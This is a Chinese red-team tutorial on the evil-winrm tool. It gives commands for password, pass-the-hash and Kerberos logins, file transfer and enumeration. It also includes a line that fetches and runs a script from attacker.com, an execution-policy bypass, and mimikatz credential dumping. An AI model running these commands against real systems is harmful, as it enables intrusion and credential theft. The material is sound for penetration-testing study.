文章总结: evil-winrm是一个强大的Windows远程管理工具,支持密码、哈希和Kerberos票据等多种认证方式,集成了文件传输和PowerShell功能,是红队在内网渗透中获取并维持Windows主机访问权限的利器。 综合评分: 88 文章分类: 渗透测试,红队,内网渗透,安全工具
黑客武器库 | evil-winrm
原创
玄鹄安全
高级红队专家
2025年12月17日 07:20 中国香港
一、基本介绍
evil-winrm 是一个用于通过 Windows Remote Management (WinRM) 协议与 Windows 系统进行交互的工具,支持在 Linux 环境中对 Windows 主机进行远程管理、命令执行和文件传输。
二、安装方法(kali已经自带)
1. Ruby Gem 安装
bash
# 使用 Ruby Gem 安装
gem install evil-winrm
2. GitHub 源码安装
bash
# 克隆仓库
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
# 安装依赖
bundle install
三、基本连接命令
1. 使用用户名和密码连接
bash
# 基本连接
evil-winrm -u Administrator -p 'Password123!' -i 10.10.10.100
# 指定域
evil-winrm -u Administrator -p 'Password123!' -i dc.domain.local -d DOMAIN
2. 使用哈希连接(Pass-the-Hash)
bash
# 使用 NTLM 哈希
evil-winrm -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -i 10.10.10.100
# 使用域用户哈希
evil-winrm -u Administrator -H <NTLM_Hash> -i dc.domain.local -d DOMAIN
3. 使用 Kerberos 票据连接
bash
# 使用 Kerberos 票据
export KRB5CCNAME=/path/to/ticket.ccache
evil-winrm -i dc.domain.local -u username -k -r DOMAIN
四、高级选项和参数
1. SSL/TLS 连接
bash
# 使用 SSL(端口 5986)
evil-winrm -u Administrator -p 'Password123!' -i 10.10.10.100 -S
# 指定自定义端口
evil-winrm -u Administrator -p 'Password123!' -i 10.10.10.100 -P 5986
2. 代理支持
bash
# 通过代理连接
evil-winrm -u Administrator -p 'Password123!' -i 10.10.10.100 -x 127.0.0.1 -X 8080
3. IPv6 支持
bash
# 连接到 IPv6 地址
# 先在 /etc/hosts 中添加映射
echo "2001:db8::1 dc6.domain.local" >> /etc/hosts
evil-winrm -u Administrator -p 'Password123!' -i dc6.domain.local
4. 会话选项
bash
# 禁用远程路径补全(解决 Ruby 限制)
evil-winrm -u Administrator -p 'Password123!' -i 10.10.10.100 -N
# 启用会话日志
evil-winrm -u Administrator -p 'Password123!' -i 10.10.10.100 -L /path/to/logfile.log
5. 证书认证
bash
# 使用证书认证(v3.7+)
evil-winrm -i 10.10.10.100 --cert-pem /path/to/cert.pem --key-pem /path/to/key.pem
五、文件传输功能
1. 上传文件
bash
# 在 evil-winrm 会话中上传文件
upload /local/path/file.txt C:\remote\path\file.txt
2. 下载文件
bash
# 在 evil-winrm 会话中下载文件
download C:\remote\path\file.txt /local/path/file.txt
3. 批量上传脚本
bash
# 上传整个目录的脚本
evil-winrm -u Administrator -p 'Password123!' -i 10.10.10.100 -s /path/to/scripts/
六、内置命令和功能
1. 文件系统操作
bash
# 列出目录
ls
dir
# 改变目录
cd C:\Users\Administrator\Desktop
# 创建目录
mkdir NewFolder
# 删除文件
del file.txt
# 查看文件内容
type file.txt
cat file.txt
2. 进程管理
bash
# 查看进程
ps
tasklist
# 结束进程
kill <PID>
3. 网络操作
bash
# 网络配置
ipconfig
netstat -ano
# DNS 查询
nslookup domain.com
4. 用户和组管理
bash
# 查看当前用户
whoami
# 查看用户信息
net user
net user Administrator
# 查看组信息
net localgroup administrators
5. 服务管理
bash
# 查看服务
sc query
Get-Service
# 启动/停止服务
sc start ServiceName
sc stop ServiceName
七、PowerShell 集成
1. 执行 PowerShell 命令
bash
# 直接执行 PowerShell 命令
*Evil-WinRM* PS> Get-Process
*Evil-WinRM* PS> Get-Service | Where-Object {$_.Status -eq "Running"}
2. 加载 PowerShell 脚本
bash
# 上传并执行 PowerShell 脚本
upload PowerView.ps1
Import-Module .\PowerView.ps1
# 或者直接远程加载
IEX(New-Object Net.WebClient).DownloadString(" http://attacker.com/PowerView.ps1 ")
3. 绕过执行策略
bash
# 在会话中设置执行策略
Set-ExecutionPolicy Bypass -Scope Process
八、实际使用案例
1. 从文档中的示例
bash
# 示例 1:使用哈希连接
evil-winrm -u Administrator -H d9485863c16******b9df -i 10.10.10.175
# 示例 2:域环境连接
evil-winrm -i frizzdc.frizz.htb -r frizz.htb -k M.schoolbus.ccache
# 示例 3:使用密码连接
evil-winrm -u adam.scott -p 'iloveyou1' -i 10.10.11.95
九、与其他工具联动
1. 与 Impacket 集成
bash
# 获取 Kerberos 票据后使用
export KRB5CCNAME=Administrator.ccache
evil-winrm -i dc.domain.local -k -u administrator -r DOMAIN
2. 与 BloodHound 集成
bash
# 收集 BloodHound 数据
upload SharpHound.exe
.\SharpHound.exe --CollectionMethod All --Domain domain.local --ZipFileName loot.zip
download loot.zip
3. 与 Mimikatz 集成
bash
# 上传并执行 Mimikatz
upload mimikatz.exe
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
查看原文:《黑客武器库 | evil-winrm》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论